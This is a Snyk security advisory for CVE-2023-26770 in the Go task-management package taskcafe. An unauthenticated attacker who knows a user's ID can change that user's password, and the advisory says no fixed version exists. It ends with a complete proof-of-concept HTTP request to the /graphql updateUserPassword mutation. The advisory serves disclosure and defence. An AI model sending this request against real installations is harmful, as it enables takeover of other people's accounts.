Improper Access Control Affecting github.com/jordanknott/taskcafe package, versions >=0.0.0
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.04% (11th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-GOLANG-GITHUBCOMJORDANKNOTTTASKCAFE-8163070
- published 6 Oct 2024
- disclosed 4 Oct 2024
- credit Joan Bono, Luis Adrián De la Rosa Hernández
Introduced: 4 Oct 2024
CVE-2023-26770 Open this link in a new tabHow to fix?
There is no fixed version for github.com/jordanknott/taskcafe.
Overview
Affected versions of this package are vulnerable to Improper Access Control due to insufficient checks of password's change process. This allows a remote, unauthenticated attacker to change a user's password by knowing the associated user ID.
PoC
POST /graphql HTTP/1.1
Host: localhost:3333
Content-Length: 301
content-type: application/json
Cookie: authToken=DUMMY
Connection: close
{
"operationName": "updateUserPassword",
"variables": {
"userID": "f426e964-99b7-4ab2-a88d-3b1298062462",
"password": "exploit"
},
"query": "mutation updateUserPassword($userID: UUID!, $password: String!) {\n updateUserPassword(input: {userID: $userID, password: $password}) {\n ok\n __typename\n }\n}\n"
}